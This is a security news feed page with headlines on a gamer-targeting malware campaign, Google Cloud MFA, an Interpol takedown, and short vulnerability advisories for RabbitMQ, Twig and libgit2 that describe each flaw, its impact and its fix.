Security
Headlines
HeadlinesLatestCVEs

Latest News

Chinese Gamers Targeted in Winos4.0 Framework Scam

Campaigns like Silver Fox and Void Arachne are deploying the framework, using social media and messaging platforms to lure in victims.

DARKReading
Open in Source
#auth
Google Cloud to Enforce MFA on Accounts in 2025

Google Cloud will take a phased approach to make multifactor authentication mandatory for all users.

German Law Could Protect Researchers Reporting Vulns

The draft amendment also includes prison time for those who access systems to maliciously spy or intercept data.

Attackers Breach IT-Based Networks Before Jumping to ICS/OT Systems

SANS's "2024 State of ICS.OT Cybersecurity report" highlights the most common types of attack vectors used against ICT/OT networks.

International Police Effort Obliterates Cybercrime Network

Interpol disrupts 22,000 malicious IP addresses, 59 servers, 43 electronic devices, and arrests 41 suspected cybercriminals.

GHSA-pj33-75x5-32j4: RabbitMQ HTTP API's queue deletion endpoint does not verify that the user has a required permission

### Summary Queue deletion via the HTTP API was not verifying the `configure` permission of the user. ### Impact Users who had all of the following: 1. Valid credentials 2. Some permissions for the target virtual host 3. HTTP API access could delete queues it had no (deletion) permissions for. ### Workarounds Disable management plugin and use, for example, [Prometheus and Grafana](https://www.rabbitmq.com/docs/prometheus) for monitoring. ### OWASP Classification OWASP Top10 A01:2021 – Broken Access Control

GHSA-jjxq-ff2g-95vh: Twig has unguarded calls to `__isset()` and to array-accesses when the sandbox is enabled

### Description In a sandbox, and attacker can access attributes of Array-like objects as they were not checked by the security policy. They are now checked via the property policy and the `__isset()` method is now called after the security check. **This is a BC break.** ### Resolution The sandbox mode now ensures access to array-like's properties is allowed. The patch for this issue is available [here](https://github.com/twigphp/twig/commit/249615d3bfc3ce1672815a265458c0bcf8f7cc61) for branch 3.11.x. ### Credits We would like to thank Jamie Schouten for reporting the issue and Nicolas Grekas for providing the fix.

GHSA-6377-hfv9-hqf6: Twig has unguarded calls to `__toString()` when nesting an object into an array

### Description In a sandbox, an attacker can call `__toString()` on an object even if the `__toString()` method is not allowed by the security policy when the object is part of an array or an argument list (arguments to a function or a filter for instance). ### Resolution The sandbox mode now checks the `__toString()` method call on all objects. The patch for this issue is available [here](https://github.com/twigphp/twig/commit/407647c1036518c90b0188bb31b55f19ca84c328) for branch 3.x. ### Credits We would like to thank Jamie Schouten for reporting the issue and Fabien Potencier for providing the fix.

Despite Emerging Regulations, Mobile Device, IoT Security Requires More Industry Attention

Omdia Principal Analyst Hollie Hennessy says that until a promising new set of regulations around the world comes online, connected device security entails a shared responsibility among consumers, enterprises, and manufacturers.

Gentoo Linux Security Advisory 202411-05

Gentoo Linux Security Advisory 202411-5 - Multiple vulnerabilities have been discovered in libgit2, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 1.7.2 are affected.